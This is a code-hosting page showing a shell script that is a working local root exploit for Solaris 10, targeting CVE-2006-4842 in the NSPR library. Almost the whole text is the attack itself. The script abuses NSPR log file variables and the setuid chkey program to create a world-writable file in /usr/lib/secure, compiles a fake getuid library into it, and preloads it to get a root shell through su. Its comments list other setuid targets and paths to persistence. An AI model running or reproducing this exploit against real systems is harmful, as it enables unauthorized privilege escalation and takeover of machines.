-
Notifications
You must be signed in to change notification settings - Fork 115
/
raptor_libnspr2
75 lines (67 loc) · 2.11 KB
/
raptor_libnspr2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/bin/sh
#
# $Id: raptor_libnspr2,v 1.6 2006/10/23 16:25:34 raptor Exp $
#
# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Local exploitation of a design error vulnerability in version 4.6.1 of
# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to
# create or overwrite arbitrary files on the system. The problem exists
# because environment variables are used to create log files. Even when the
# program is setuid, users can specify a log file that will be created with
# elevated privileges (CVE-2006-4842).
#
# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Other
# possible (but less l33t;) attack vectors are: /var/spool/cron/atjobs,
# /root/.ssh/authorized_keys, /root/.bash{rc,_profile,logout}, /etc/rc?.d.
#
# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr
#
# Usage:
# $ chmod +x raptor_libnspr2
# $ ./raptor_libnspr2
# [...]
# Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# # id
# uid=0(root) gid=0(root)
# # rm /usr/lib/secure/getuid.so
# #
#
# Vulnerable platforms (SPARC):
# Solaris 10 without patch 119213-10 [tested]
#
# Vulnerable platforms (x86):
# Solaris 10 without patch 119214-10 [untested]
#
echo "raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
# prepare the environment
NSPR_LOG_MODULES=all:5
NSPR_LOG_FILE=/usr/lib/secure/getuid.so
export NSPR_LOG_MODULES NSPR_LOG_FILE
# gimme -rw-rw-rw-!
umask 0
# setuid program linked to /usr/lib/mps/libnspr4.so
/usr/bin/chkey
# other good setuid targets
#/usr/bin/passwd
#/usr/bin/lp
#/usr/bin/cancel
#/usr/bin/lpset
#/usr/bin/lpstat
#/usr/lib/lp/bin/netpr
#/usr/sbin/lpmove
#/usr/bin/su
#/usr/bin/mailq
# prepare the evil shared library
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "problems compiling evil shared library, check your gcc"
exit 1
fi
# newschool LD_PRELOAD foo;)
unset NSPR_LOG_MODULES NSPR_LOG_FILE
LD_PRELOAD=/usr/lib/secure/getuid.so su -